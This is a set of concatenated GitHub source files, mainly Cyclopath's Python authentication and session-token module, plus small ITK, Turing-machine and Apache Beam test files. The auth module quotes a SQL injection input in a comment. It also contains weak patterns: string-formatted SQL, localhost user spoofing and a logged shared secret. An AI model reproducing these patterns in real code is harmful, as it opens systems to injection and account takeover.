"""
for attributeName, attributeValues in attributes.iteritems():
for attributeValue in attributeValues:
print " " + attributeName + ": " + attributeValue
def buildSummary( self, records):
"""
Build
"""
summary = {}
for record in records:
dn,attributes = record
summary [dn.lower()] = (dn,attributes)
return summary
def compare( self):
"""
Check whether the two named files are equal.
"""
self.src1.parse()
summary1 = self.buildSummary( self.src1.all_records)
self.src2.parse()
summary2 = self.buildSummary( self.src2.all_records)
count = self.emitDifferences( summary1, summary2)
if( count > 0):
exit(1)
if( len(sys.argv) != 3):
sys.exit("Need two arguments")
verifier = LDIFVerifier( sys.argv[1], sys.argv[2])
verifier.compare()
| {
"content_hash": "1e601ceafc90b579c2c87316f1aafe1d",
"timestamp": "",
"source": "github",
"line_count": 109,
"max_line_length": 116,
"avg_line_length": 32.41284403669725,
"alnum_prop": 0.5544862722898387,
"repo_name": "paulmillar/Xylophone",
"id": "ff21c68f2e51945ea6b7ba9e68e63c9bda213c6d",
"size": "3552",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/util/compare.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Makefile",
"bytes": "727"
},
{
"name": "Python",
"bytes": "3552"
},
{
"name": "XSLT",
"bytes": "171413"
}
],
"symlink_target": ""
} |
import conf
import g
import hashlib
import os
import psycopg2
import time
import urllib
import uuid
from grax.user import User
from gwis.query_base import Query_Base
from gwis.exception.gwis_error import GWIS_Error
from gwis.exception.gwis_warning import GWIS_Warning
from util_ import db_glue
from util_ import misc
log = g.log.getLogger('gwis.q_client')
class Query_Client(Query_Base):
__after_slots__ = (
'ip_addr', # ip address of the request
'remote_ip',
'remote_host',
'browser_id', # UUID session id for the browser
'session_id', # UUID session id for the client
'username', # User making request, or conf.anonymous_username
'user_id', # ID of user making request, or None for anon
'user_group_id', # User's private group ID, which could be anon group
'request_is_mobile', # Used to know if request came from Ccp Android app.
'request_is_local', # If the request is coming from a local(host) script
'request_is_script', # If the request is coming from a local(host) script
'request_is_secret', # If the request used the shared secret
'token_ok', # True if the user token is valid
)
# *** Constructor
def __init__(self, req):
Query_Base.__init__(self, req)
log.areq = req.areq
# Cache the IP address for simpler retrieval later
# FIXME: Are these always the same? Is one 'safer' to use?
if self.req.areq is not None:
self.ip_addr = self.req.areq.subprocess_env['REMOTE_ADDR']
self.remote_ip = self.req.areq.connection.remote_ip
# This is set in Fedora but not in Ubuntu.
self.remote_host = self.req.areq.connection.remote_host
rem_host = self.req.areq.get_remote_host()
if self.remote_host is None: # Ubuntu
# Ubuntu: '127.0.0.1', not Fedora: 'localhost'
self.remote_host = rem_host
# FIXME: I don't quite get the differences between OSes yet.
if self.remote_host == '127.0.0.1':
self.remote_host = 'localhost'
# FIXME: assert-if-debugging, like, m4 preprocess? with intent to be
# faster (you could test with the update script)
#g.assurt(self.remote_host == self.req.areq.hostname)
log.verbose('remote: ip: %s (%s) / host: %s (%s) / (%s)'
% (self.remote_ip, # same as ip_addr
self.ip_addr, # should be == eg 127.0.0.1
self.remote_host, # None in Ubuntu, else hostname
rem_host, # Ubuntu: 127.0.0.1
self.req.areq.hostname, # Ubuntu: localhost
))
else:
self.ip_addr = '127.0.0.1'
self.remote_ip = '127.0.0.1'
self.remote_host = 'localhost.localdomain'
self.request_is_mobile = False
self.request_is_local_set()
#
self.username = None
self.user_id = None
self.user_group_id = None
# ***
#
def request_is_local_set(self):
self.request_is_local = False
self.request_is_script = False
self.request_is_secret = False
try:
hostname = self.req.areq.hostname
g.assurt(hostname)
except AttributeError:
# This happens from routed.py, which creates a fake request for
# search_graph.
g.assurt(self.req.areq is None)
hostname = ''
log.verbose1('request_is_local_set: %s'
% (self.str_remote_ip_and_host_and_local_host(),))
# Validate the server from where the request came. This has to be the
# conf.server_names (set in CONFIG). [M.f. command_client.py]
# 2012.08.16: Instead of assurting, return a nice error code instead
# (otherwise user sees "Cyclopath is having difficulty communicating
# with the Cyclopath servers", which is wrong because that's not the
# issue (and it's also wrong because there's only one Cyclopath server,
# not many of them)). See Bug 2713.
if ((hostname)
and (hostname not in conf.server_names)
and (hostname != conf.server_name)
and (hostname != 'localhost')
and (hostname != '127.0.0.1')):
log.error('Unexpected request on hostname: %s.'
% (hostname,))
raise GWIS_Error(
'%s%s'
% ('The Cyclopath server does not expect requests from %s. '
% (hostname,),
'Please check your URL or email %s for help.'
% (conf.mail_from_addr,),))
# We like to know if the request is local so we can enable commands we
# don't normally accept from remote clients (i.e., so we can support
# developer or experimental features, like changing group access
# permissions).
# NOTE The ccp.py script can be used to directly interact with pyserver,
# or it can interface with GWIS packets. In the latter case, we
# cannot determine if the call is coming from the script or from the
# user using flashclient.
# NOTE I've [lb has] seen os.getenv('PythonHandler') set in other
# environs, but not on Fedora Linux.
# NOTE: On Fedora, from ccp.py, os.getenv('_') == './ccp.py'
# NOTE: On Fedora, if you disable the network, these... return False?
is_httpd_user = ((os.getenv('APACHE_RUN_USER') == 'www-data') # Ubuntu
or (os.getenv('_') == '/usr/sbin/httpd')) # Fedora
if ( ((self.remote_host == 'localhost.localdomain')
or (self.remote_host == 'localhost')
or (self.remote_host == conf.server_ip))
and ((self.remote_ip == '127.0.0.1')
or (self.remote_ip == conf.server_ip))
and ((not hostname) or (hostname in conf.server_names))):
# FIXME (and EXPLAIN): Are the Apache request's host and IP
# trustworthy? I don't think so. But can they be spoofed
# to look like they're from localhost?
# BUG nnnn: We need to better lockdown the site... --no-password
# is such a back-door: you just need terminal access to
# the machine...
self.request_is_local = True
if not is_httpd_user:
g.assurt(self.req.areq is None)
# LOGNAME is set when a human user runs script, but not for apache.
g.assurt(os.getenv('LOGNAME'))
# NOTE: Also, normally, os.getenv('_') == '/usr/bin/python'
# or == './ccp.py', depending.
self.request_is_script = True
else:
g.assurt(is_httpd_user)
g.assurt(self.req.areq is not None)
#
def str_remote_ip_and_host_and_local_host(self):
remote_id = (
'from: %s / %svia: %s'
% (self.remote_ip,
'' if (self.remote_host == self.remote_ip)
else '%s / ' % (self.remote_host,),
self.req.areq.hostname if self.req.areq is not None else 'none',))
return remote_id
# *** Base class overrides
#
def decode_gwis(self):
self.browser_id = self.req.decode_key('browid', None)
# FIXME/Bug nnnn: This should be verified and maybe stored by us somehow.
# FIXME: GIA records that use sessid should timeout the sessid and clear
# the value eventually...
self.session_id = self.req.decode_key('sessid', None)
try:
self.session_id = uuid.UUID(self.session_id)
# Convert to string to get rid of the class wrapper.
# >>> uuid.uuid4()
# UUID('ed05a929-6acf-4315-abf2-8b229babf347')
# >>> str(uuid.uuid4())
# 'b1f691f6-0fb7-419f-811e-1a74c3c995a1'
self.session_id = str(self.session_id)
except TypeError:
g.assurt(not self.session_id)
# The user did not specify a session ID, so we should do it.
self.session_id = str(uuid.uuid4())
# But currently this is unexpected, since flashclient and android
# currently make up their own UUID (see Bug nnnn mentioned above
# about having pyserver assign and manage unique session IDs).
# MAYBE: For devs testing, e.g., with wget, there's no session ID.
# But maybe we should always make it mandatory so people
# don't game the system?
# 2014.09.20: logcheck says this happened again. Nothing weird
# in the apache log, though. And it wasn't a dev using wget or
# anything, [lb] don't think.
#
log.error('decode_gwis: unexpected: no Session ID')
# MAYBE: Is it ok to log the request?
log.info('EXPLAIN: decode_gwis: areq.the_request: %s'
% (self.req.areq.the_request,))
except:
# ValueError on wrongly-formatted str; AttributeError on other types.
raise GWIS_Error('decode_gwis: bad session ID')
# FIXME: Is this the proper place for this code?
# FIXME: Why does device come in metadata and not GET?
if self.req.doc_in is not None:
device = self.req.doc_in.find('metadata/device')
# FIXME: Compare to other place request_is_mobile is set (below).
if device is not None:
# NOTE: The URL might also contain "android=true".
# EXPLAIN: Diff. btw URL and metadata indicating android?
# The two seem redundant...
self.request_is_mobile = device.get('is_mobile', False)
# *** Public interface
#
def remote_host_or_remote_ip(self):
return (self.remote_host or self.remote_ip)
#
def user_token_generate(self, username):
''' '''
# Lookup the userid
res = self.req.db.sql(
"SELECT id FROM user_ WHERE username = %s", (username,))
# Bail if user doesn't exist
if len(res) != 1:
return None # no such user
user_id = res[0]['id']
# In Ccpv1, this fcn. used the user's hashed password and some request
# parameters (remote_addr, self.req.areq.protocol, HTTP_USER_AGENT,
# HTTP_ACCEPT_CHARSET, and HTTP_ACCEPT_LANGUAGE) to make the token, but
# that's not a very robust solution.
#
# See http://bugs.grouplens.org/show_bug.cgi?id=2608
#
# Basically, random, unique tokens are more secure, and flashclient
# uses different headers for normal GWIS requests vs. uploads, so a
# generated-token approach doesn't work, anyway; we should store the
# token in the database rather than trying to make it.
# Ccpv1:
# # Lookup the password
# r = self.req.db.sql(
# "SELECT password FROM user_ WHERE username = %s", (username,))
# token = (
# r[0]['password']
# + remote_addr
# + env.get('HTTP_USER_AGENT', '@')
# + env.get('HTTP_ACCEPT_CHARSET', '@')
# + self.req.areq.protocol
# + env.get('HTTP_ACCEPT_LANGUAGE', '@'))
# #self.req.p_notice('unhashed token for %s: %s' % (username, token))
# token = hashlib.md5(token).hexdigest()
# Count the number of times we try, so we don't try indefinitely.
num_tries = 1
if self.req.db.integrity_errs_okay:
log.warning('user_token_generate: unexpected integrity_errs_okay')
self.req.db.integrity_errs_okay = True
found_unique = False
while not found_unique:
token = str(uuid.uuid4())
# For now, test the same one and see what server throws
log.debug('user_token_generate: trying token: %s' % (token,))
if num_tries > 99:
raise GWIS_Error('user_token_generate: Too many tries!')
try:
# Lock the user_ table on the user name so we don't ever generate
# two active tokens for a user.
# FIXME: What about multiple devices? Like, desktop Web browser and
# mobile phone app...
# (found_row, locked_ok,
# ) = self.req.db.transaction_lock_row(
# 'user_', 'username', username)
# Ug, we don't need a lock so long as we're just inserting...
self.req.db.transaction_begin_rw()
# FIXME: Set date_expired after x minutes of inactivity!
# (In CcpV1, there was no expiry...)....
# FIXME: Don't do this, because user should be allowed to logon
# from more than one client.
#res = self.req.db.sql(
# """
# UPDATE
# user__token
# SET
# date_expired = now()
# WHERE
# username = '%s'
# -- AND user_id = %d
# AND date_expired IS NULL
# """ % (username, user_id,))
#g.assurt(res is None)
# Try the insert.
res = self.req.db.sql(
# SYNC_ME: ccpdev...logcheck/pyserver...sql().
# Don't use a preceeding newline.
"""INSERT INTO user__token
(user_token, username, user_id)
VALUES
('%s', '%s', %d)
""" % (token, username, user_id,))
g.assurt(res is None)
found_unique = True
# BUG 2688: Use transaction_retryable?
self.req.db.transaction_commit()
except psycopg2.IntegrityError, e:
# IntegrityError: duplicate key value violates unique constraint
# "user__token_pkey"\n
log.debug('token_gen: IntegrityError: %s' % (str(e),))
g.assurt(str(e).startswith('duplicate key value violates'))
num_tries += 1 # Try again
self.req.db.transaction_rollback()
self.req.db.integrity_errs_okay = False
log.debug('user_token_generate: %s / new token: %s' % (user_id, token,))
return token
#
# If called via transaction_retryable:
# def user_token_verify(self, db, *args, **kwargs):
# (token, username,) = args
# but let's try the transaction_lock_row_logic fcn.
# with a timeout and/or max_tries.
#
# FIXME/BUG nnnn: mobile should use the token we send it.
#
def user_token_verify(self, token, username, going_deeper=False):
g.assurt(token and username)
# Get a lock on the token just so we can update its count. This
# shouldn't block except for overlapping requests from the same
# client, so no biggee.
# MAYBE: We don't need the lock except to update usage_count...
# which doesn't seem very much that important...
self.token_ok = False
# MAYBE: Using NOWAIT fails when server load is high, so [lb]
# uses STATEMENT_TIMEOUT instead of NOWAIT.
# But another solution might be to wrap UPDATE with a try/catch
# and not to lock at all...
time_0 = time.time()
found_row = None
locked_ok = False
try:
(found_row, locked_ok,
) = self.req.db.transaction_lock_row_logic(
table_to_lock='user__token',
row_logic=[('user_token', '=', self.req.db.quoted(token),),
('date_expired', 'IS', 'NULL',),
('usage_count', None, None,),
('username', None, None,),
],
#timeout=conf.gwis_default_timeout, # 2014.09.09: 80.0 secs.
# 2014.09.14: We can continue without the token lock (we'll
# just not update the user__token.usage_count value) so don't
# take forever until timing out.
# FIXME/BUG nnnn: Seriously, locking a user__token row should
# almost always work, so why is this not working when the server
# is busy running daily.runic.sh?
timeout=10.0, # MAGIC NUMBER: Try for at most 10 seconds...
max_tries=None,
timeout_logger=log.info)
# Log a Warning (which logcheck will see) above a certain
# threshold, and at least log a debug message above a lower
# bar. [lb] doesn't want to flood us with emails but I want
# to track this issue... i.e., What is causing it to take so
# long to get the lock: is the server "just busy"? I've seen
# this issue when I run the daily cron job, which dumps the
# database, etc. Maybe having one hard drive doing all of the
# dirty work just really sucks...
misc.time_complain('user_token_verify get user__token lock',
time_0,
# 2014.09.08: [lb] sees upwards of 2 seconds
# here and there... hrmmmm, should
# we worry?
#threshold_s=0.75,
#threshold_s=1.00,
#threshold_s=2.00,
#threshold_s=2.50,
# 2014.09.14: When cron runs our overnight jobs,
# this always seems to fire (try, say, at 3:15 AM).
# 2014.09.19: How exactly does this work?:
# Sep-19 03:28:20: time_complain: ... took 13.12 m.
#threshold_s=conf.gwis_default_timeout, # No errs?
# BUG nnnn/LOW PRIORITY?/EXPLAIN:
# gwis_default_timeout is not being honored,
# i.e., we set a 10 sec. timeout on lock-row but
# db_glue spins for 13 minutes? How does that work?
# The only reasonable explanation is that
# psycopg2's curs.execute took that long, right?
#threshold_s=840.0, # MAGIC_NUMBER: 840 s = 14 mins
threshold_s=1338.0, # MAGIC_NUMBER: 22.30 mins
at_least_debug=True,
debug_threshold=0.10,
info_threshold=0.25)
except psycopg2.DataError, e:
# This is only possible if client request is malformed. E.g.,
# DataError: invalid input syntax for uuid: "gibberish"
# LINE 10: AND user_token = 'gibberish'
log.error('user_token_verify: bad token: %s' % (token,))
raise GWIS_Warning('Unknown username or token',
'badtoken')
except Exception, e:
raise
if found_row:
# NOTE: This commits self.req.db, which recycles the cursor.
self.token_ok = self.user_token_verify_(found_row,
token,
username,
lock_acquired=locked_ok)
log.verbose(
'user_token_verify: found_row: %s / locked_ok: %s / token_ok: %s'
% (found_row, locked_ok, self.token_ok,))
return found_row
#
def user_token_verify_(self, found_row, token, username, lock_acquired):
token_ok = False
if found_row['username'] != username:
self.req.db.transaction_rollback()
log.error('user_token_verify_: tkn: %s / row[0][u]: %s / usrnm: %s'
% (token, found_row['username'], username,))
raise GWIS_Error('%s %s'
% ('Token found but username does not match.',
'Please log out and log on again.',))
# Token ok! Update the count, if we can.
# BUG nnnn: When the server is busy, especially during the nightly
# cron, since each user and each script generates lots of requests,
# oftentimes psql timesout trying to lock the user__token row for
# update (after trying for 4 secs., e.g.). Fortunately, the
# usage_count is not an important value, so it can underrepresent
# it's true value.
# EXPLAIN: Each request only locks user__token briefly at the start
# of each request, but releases it soon after. So why are
# we timing out??
# Here's a snippet from the production server: note the big time gap
# between log messages:
# 03:56:38 util_.db_glue # Thd 2 # lck_row_lgc: locking user__token...
# 03:56:42 gwis.request # Thd 1 # areq_send_resp: sent 70 gwis bytes.
# 03:56:42 util_.db_glue # Thd 2 # sql: query canceled:
# canceling statement due to statement timeout
#
if lock_acquired:
update_sql = (
"""
UPDATE user__token
SET usage_count = usage_count + 1
WHERE date_expired IS NULL
AND user_token = %s
""")
update_row = self.req.db.sql(update_sql, (token,))
g.assurt(update_row is None)
# BUG 2688: Use transaction_retryable?
self.req.db.transaction_commit()
log.info('user_validate: token and lock: %s / %s / new cnt >=: %s'
% (username,
self.str_remote_ip_and_host_and_local_host(),
found_row['usage_count'] + 1,))
else:
log.info('user_validate: token w/o lock: %s / %s / old cnt: %s'
% (username,
self.str_remote_ip_and_host_and_local_host(),
found_row['usage_count'],))
token_ok = True
return token_ok
#
def user_validate_maybe(self, variant=None):
if self.username is None:
self.user_validate(variant)
#
def user_validate(self, variant=None):
'''
Check the username and password/token included in the GWIS request.
- If not provided set self.username to anonymous username
- If provided and valid set self.username to validated username
- If provided and invalid raise GWIS_Error.
'''
log.verbose1('user_validate: variant: %s' % (str(variant),))
user = None
if self.req.doc_in is not None:
user = self.req.doc_in.find('metadata/user')
if user is None:
# No auth data; set username to the anonymous user
log.info('user_validate: anon: %s / %s'
% (conf.anonymous_username,
self.str_remote_ip_and_host_and_local_host(),))
self.username = conf.anonymous_username
self.user_group_id = User.private_group_id(self.req.db,
conf.anonymous_username)
g.assurt(self.user_group_id > 0)
else:
# Parse and validate the username and credentials; raises on error.
self.user_validate_parse(user, variant)
if self.username is not None:
# Check user's access to branch. Raises GWIS_Error if access denied.
self.req.branch.branch_hier_enforce()
#
def user_validate_parse(self, user, variant):
'''
Called if the GWIS client includes a username. Here we verify the
username and password or token. The fcn. raises GWIS_Error if the
user cannot be authenticated.
'''
valid = False
username = user.get('name').lower()
password = user.get('pass')
sdsecret = user.get('ssec')
token = user.get('token')
g.assurt((password is None) or (token is None))
# NOTE: In CcpV1, route reactions adds save_anon. E.g.,
# # If save_anon is set, then perform the save as an anonymous user.
# save_anon = bool(int(self.decode_key('save_anon', False)))
# if save_anon:
# self.req.username = None
# but this is hopefully unnecessary. And it seems... wrong, like, we
# should set a bool that the user wants to save anonymously, otherwise
# none of the code will know there's a real user here (e.g., for tracing
# or storing stats).
# *** MAGIC AUTH
if ((conf.magic_localhost_auth)
and (self.ip_addr == conf.magic_auth_remoteip)):
# HACK: localhost can be whomever they like
# This is similar to the ccp script's --no-password, but this is used
# for spoofing another user via flashclient.
# Logs an Apache warning.
self.req.p_warning('user %s from localhost: magic auth' % (username,))
# Redundantly log a pyserver warning.
# FIXME: Do we really need to log Apache warnings at all?
log.warning('SPOOFING USER: %s from %s' % (username, self.ip_addr,))
# *** PASSWORD AUTH
elif variant == 'password':
if password:
r = self.req.db.sql("SELECT login_ok(%s, %s)",
(username, password,))
g.assurt(len(r) == 1)
if not r[0]['login_ok']:
self.auth_failure(username, 'password')
raise GWIS_Warning(
'Incorrect username and/or password.',
tag=None, logger=log.info)
elif not sdsecret:
raise GWIS_Warning(
'Please specify a password with that username.',
tag=None, logger=log.info)
log.info('user_validate: pwdd: %s / %s'
% (username,
self.str_remote_ip_and_host_and_local_host(),))
# FIXME: Statewide UI: Cleanup Session IDs records on login/logout.
# FIXME: Use cron job to mark date_expired where last_modified is
# some number of minutes old? flashclient log should keep
# token active, right?
# See the unimplemented: gwis/command_/user_goodbye.py
# 2014.09.09: The date_expired field in really old tokens
# is still NULL...
# *** TOKEN AUTH
elif variant == 'token':
log.verbose1('user_validate_parse: token: %s / username: %s'
% (token, username,))
if token is None:
log.warning('user_validate_parse: EXPLAIN: Why is the token None?')
raise GWIS_Warning('Token not found! Please login again.',
'badtoken')
# Avoid transaction_retryable, at least so long as it expects a
# specific TransactionRollbackError, but transaction_lock_row_logic
# simply raises Exception.
# success = self.req.db.transaction_retryable(
# self.user_token_verify, self.req, token, username)
# 2013.09.25: Using SELECT... FOR UPDATE NOWAIT seemed to work okay
# until [lb] started running runic's daily cron job and also a
# shapefile import script -- then all lock-rows came back failed.
# But the scripts aren't even touching that database or the
# user__token row! What gives?! I searched and couldn't find any
# indication that NOWAIT and FOR UPDATE do anything other than on
# the row on which they're suppose to behave... so this is truly
# strange. So now db_glue uses STATEMENT_TIMEOUT instead of NOWAIT.
found_row = self.user_token_verify(token, username)
if found_row is None:
log.info(
'user_validate_parse: timeout on token verify: username: %s'
% (username,))
raise GWIS_Warning(
'Please try your request again (server very busy).',
'sadtoken',
logger=log.info)
elif found_row is False:
log.warning(
'user_validate_parse: not found_row: token: %s / username: %s'
% (token, username,))
raise GWIS_Warning(
'Please log off and log back on (incorrect token).',
'badtoken')
# else, found_row is True
# EXPLAIN: Does p_notice write to Apache log? We're fine, because
# GWIS_Warning writes to the pyserver log... right?
#self.req.p_notice('tokens: %s %s' % (token, token_valid,))
if not self.token_ok:
# [lb] guessing this unreachable; would've raised exception by now.
log.debug('user_validate_parse: token not ok: %s' % (token,))
self.auth_failure(username, 'token')
raise GWIS_Warning(
'Please log off and log back on (incorrect token).',
'madtoken')
# *** MISSING AUTH
else:
# No match for variant.
log.warning('user_validate_parse: unknown variant: %s' % (variant,))
raise GWIS_Error('Unknown variant.', 'badvariant')
# *** SHARED SECRET
if sdsecret:
log.debug('user_validate_parse: using shared_secret to login')
if ( ('' == conf.gwis_shared_secret)
or (sdsecret != conf.gwis_shared_secret)
or (not self.request_is_local)):
log.error('Expected: %s / Got: %s / Local: %s'
% (conf.gwis_shared_secret, sdsecret, self.request_is_local,))
raise GWIS_Error('Whatchutalkinboutwillis?', 'badssec')
self.request_is_secret = True
# *** And The Rest.
# If we got and verified a token, the username was checked against what's
# in the db, so it should be clean. But if the username contains a quote
# in it, we want to make sure it's delimited properly.
# This is the simplest form of SQL injection: add a single quote and
# a true result and then terminate the statement, e.g., same username is:
# ' or 1=1;--
# E.g., SELECT * FROM user_ WHERE username='%s' AND password='%s';
# could be turned into, with, e.g., "fake_username' OR 1=1; --"
# SELECT * FROM user_
# WHERE username='fake_username' OR 1=1; -- AND password='%s';
# Of course, this is just a trivial example.
self.username = urllib.quote(username).strip("'")
if self.username != username:
raise GWIS_Warning('Bad username mismatch problem.',
'badquoteusername')
if self.req.areq is not None:
# Update Apache request_rec struct so username is recorded in logs.
self.req.areq.user = username
# Get the user ID
self.user_id = User.user_id_from_username(self.req.db, username)
g.assurt(self.user_id > 0)
# Get the user's private group ID
self.user_group_id = User.private_group_id(self.req.db, self.username)
g.assurt(self.user_group_id > 0)
# FIXME: We checked 'metadata/device' above, and now 'metadata/user' --
# which one is it?
# BUG nnnn: Don't rely on this value, since the client can spoof it.
if not self.request_is_mobile:
self.request_is_mobile = user.get('is_mobile', False)
# *** Private interface
#
def auth_failure(self, username, kind):
'''
Responds to an authentication failure.
'''
g.assurt(kind in ('password', 'token',))
# To make the sql calls easier, make a lookup
args = {
'username': username,
'is_password': (kind == 'password'),
'client_host': self.ip_addr,
'instance': conf.instance_name,
}
# We need a r/w transaction in order to record the failure
# BUG 2688: Use transaction_retryable?
self.req.db.transaction_commit()
self.req.db.transaction_begin_rw()
# Log the auth failure
# 2012.06.08: [lb] In CcpV1, I see 24 of these in a row for myself.
# What gives?
#
# EXPLAIN: The daily.runic.sh nightly cron will look at user login
# failures, and it'll complain/email if there are more than a certain
# amount per day per user.
# BUG nnnn: Do we need a better mechanism for detecting username attacks?
# Have we tested brute-force password attacks?
# What about other attacks....?
self.req.p_notice('auth failed for "%s" (%s)' % (username, kind))
log.info('auth_failure: username: %s / kind: %s' % (username, kind,))
self.auth_failure_log_event(args)
# Check if there have been too many recent failures
self.auth_failure_check_recent(kind, args)
# Commit now; we'll raise an exception shortly
# BUG 2688: Use transaction_retryable?
self.req.db.transaction_commit()
# Check if there have been too many recent failures
def auth_failure_check_recent(self, kind, args):
if (kind == 'password'):
limit_day = conf.auth_fail_day_limit_password
limit_hour = conf.auth_fail_hour_limit_password
else:
limit_day = conf.auth_fail_day_limit_token
limit_hour = conf.auth_fail_hour_limit_token
fail_ct_day = self.auth_failure_recent_fail_count(args, '1 day')
fail_ct_hour = self.auth_failure_recent_fail_count(args, '1 hour')
if ((fail_ct_day > limit_day)
or (fail_ct_hour > limit_hour)):
# over the limit - host is banned
self.req.p_warning('host banned - too many authentication failures!')
if (fail_ct_day > limit_day):
expires = "'infinity'"
else:
expires = "now() + '61 minutes'::interval"
self.auth_failure_mark_banned(args, expires)
#
def auth_failure_log_event(self, args):
self.req.db.sql(
"""
INSERT INTO auth_fail_event
(username,
client_host,
is_password,
instance)
VALUES
(%(username)s,
%(client_host)s,
%(is_password)s,
%(instance)s)
""", args)
#
def auth_failure_mark_banned(self, args, expires):
self.req.db.sql(
"""
INSERT INTO ban
(ip_address,
public_ban,
full_ban,
ban_all_gwis,
activated,
expires,
reason)
VALUES
(%%(client_host)s,
FALSE,
FALSE,
TRUE,
TRUE,
%s,
'Too many authentication failures')
""" % (expires,), args)
#
def auth_failure_recent_fail_count(self, args, interval):
# NOTE args is a dict w/ 'is_password' and 'client_host'
bans = self.req.db.sql(
"""
SELECT
count(*) AS count
FROM
auth_fail_event
WHERE
is_password = %%(is_password)s
AND NOT ignore
AND client_host = %%(client_host)s
AND created > (now() - '%s'::interval)
""" % (interval,), args)
return bans[0]['count']
# ***
# ***
| {
"content_hash": "d3a1ba4bd9fab6341c0d86d9f66db2a4",
"timestamp": "",
"source": "github",
"line_count": 838,
"max_line_length": 79,
"avg_line_length": 41.45107398568019,
"alnum_prop": 0.5589877936434823,
"repo_name": "lbouma/Cyclopath",
"id": "d37d67ec60187b8e2e50541398eaa8c7597e434c",
"size": "34848",
"binary": false,
"copies": "1",
"ref": "refs/heads/release",
"path": "pyserver/gwis/query_client.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ActionScript",
"bytes": "3369673"
},
{
"name": "ApacheConf",
"bytes": "46372"
},
{
"name": "C",
"bytes": "281248"
},
{
"name": "CSS",
"bytes": "36786"
},
{
"name": "Gnuplot",
"bytes": "14865"
},
{
"name": "HTML",
"bytes": "203213"
},
{
"name": "Java",
"bytes": "688800"
},
{
"name": "JavaScript",
"bytes": "60678"
},
{
"name": "M4",
"bytes": "35700"
},
{
"name": "Makefile",
"bytes": "8036"
},
{
"name": "PHP",
"bytes": "18399"
},
{
"name": "PLSQL",
"bytes": "451"
},
{
"name": "PLpgSQL",
"bytes": "1407944"
},
{
"name": "Perl",
"bytes": "669009"
},
{
"name": "Python",
"bytes": "5830046"
},
{
"name": "Shell",
"bytes": "639435"
}
],
"symlink_target": ""
} |
import sys
import itk
import vtk
if len(sys.argv) < 2:
print("Usage: " + sys.argv[0] + " <InputFileName>")
sys.exit(1)
imageFileName = sys.argv[1]
Dimension = 2
PixelType = itk.UC
ImageType = itk.Image[PixelType, Dimension]
reader = vtk.vtkPNGReader()
reader.SetFileName(imageFileName)
reader.SetDataScalarTypeToUnsignedChar()
magnitude = vtk.vtkImageMagnitude()
magnitude.SetInputConnection(reader.GetOutputPort())
magnitude.Update()
vtkToItkFilter = itk.VTKImageToImageFilter[ImageType].New()
vtkToItkFilter.SetInput(magnitude.GetOutput())
vtkToItkFilter.Update()
myitkImage = vtkToItkFilter.GetOutput()
print(myitkImage)
| {
"content_hash": "bd5af0af713d769f3fcd1834e6b7d431",
"timestamp": "",
"source": "github",
"line_count": 27,
"max_line_length": 59,
"avg_line_length": 23.62962962962963,
"alnum_prop": 0.7758620689655172,
"repo_name": "InsightSoftwareConsortium/ITKExamples",
"id": "dfce35f310387dcd04818146c2c45ff2968bf41c",
"size": "1236",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/Bridge/VtkGlue/ConvertvtkImageDataToAnitkImage/Code.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "1345317"
},
{
"name": "CMake",
"bytes": "468162"
},
{
"name": "CSS",
"bytes": "2087"
},
{
"name": "HTML",
"bytes": "8446"
},
{
"name": "JavaScript",
"bytes": "4743"
},
{
"name": "Python",
"bytes": "325825"
},
{
"name": "Shell",
"bytes": "37497"
}
],
"symlink_target": ""
} |
"""Classes and functions for testing the behavior of TMTapes."""
import unittest
from automata.tm.tape import TMTape
class TestTMTape(unittest.TestCase):
"""A test class for testing all Turing machines."""
def test_tape_copy(self):
"""Should copy TMTape."""
tape = TMTape('0011', blank_symbol='#', current_position=0)
new_tape = tape.copy()
self.assertIsNot(new_tape, tape)
| {
"content_hash": "001bd5ab290181348c32db1e344377ec",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 67,
"avg_line_length": 27.933333333333334,
"alnum_prop": 0.6634844868735084,
"repo_name": "caleb531/automata",
"id": "7d1ed82a8477dc6c4e09cdf8c2204621d2c223f5",
"size": "442",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/test_tmtape.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "443681"
}
],
"symlink_target": ""
} |
"""End-to-end test for Bigquery tornadoes example."""
from __future__ import absolute_import
import logging
import time
import unittest
from builtins import round
from hamcrest.core.core.allof import all_of
from nose.plugins.attrib import attr
from apache_beam.examples.cookbook import bigquery_tornadoes
from apache_beam.io.gcp.tests import utils
from apache_beam.io.gcp.tests.bigquery_matcher import BigqueryMatcher
from apache_beam.testing.pipeline_verifiers import PipelineStateMatcher
from apache_beam.testing.test_pipeline import TestPipeline
class BigqueryTornadoesIT(unittest.TestCase):
# Enable nose tests running in parallel
_multiprocess_can_split_ = True
# The default checksum is a SHA-1 hash generated from sorted rows reading
# from expected Bigquery table.
DEFAULT_CHECKSUM = 'd860e636050c559a16a791aff40d6ad809d4daf0'
@attr('IT')
def test_bigquery_tornadoes_it(self):
test_pipeline = TestPipeline(is_integration_test=True)
# Set extra options to the pipeline for test purpose
project = test_pipeline.get_option('project')
dataset = 'BigQueryTornadoesIT'
table = 'monthly_tornadoes_%s' % int(round(time.time() * 1000))
output_table = '.'.join([dataset, table])
query = 'SELECT month, tornado_count FROM `%s`' % output_table
pipeline_verifiers = [PipelineStateMatcher(),
BigqueryMatcher(
project=project,
query=query,
checksum=self.DEFAULT_CHECKSUM)]
extra_opts = {'output': output_table,
'on_success_matcher': all_of(*pipeline_verifiers)}
# Register cleanup before pipeline execution.
# Note that actual execution happens in reverse order.
self.addCleanup(utils.delete_bq_table, project, dataset, table)
# Get pipeline options from command argument: --test-pipeline-options,
# and start pipeline job by calling pipeline main function.
bigquery_tornadoes.run(
test_pipeline.get_full_options_as_args(**extra_opts))
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
| {
"content_hash": "261000063486479f3b7db59464326a18",
"timestamp": "",
"source": "github",
"line_count": 61,
"max_line_length": 75,
"avg_line_length": 35.26229508196721,
"alnum_prop": 0.703393770339377,
"repo_name": "markflyhigh/incubator-beam",
"id": "f7eb93ba609bbf5591b39e69a6b0522cfb94bc01",
"size": "2936",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
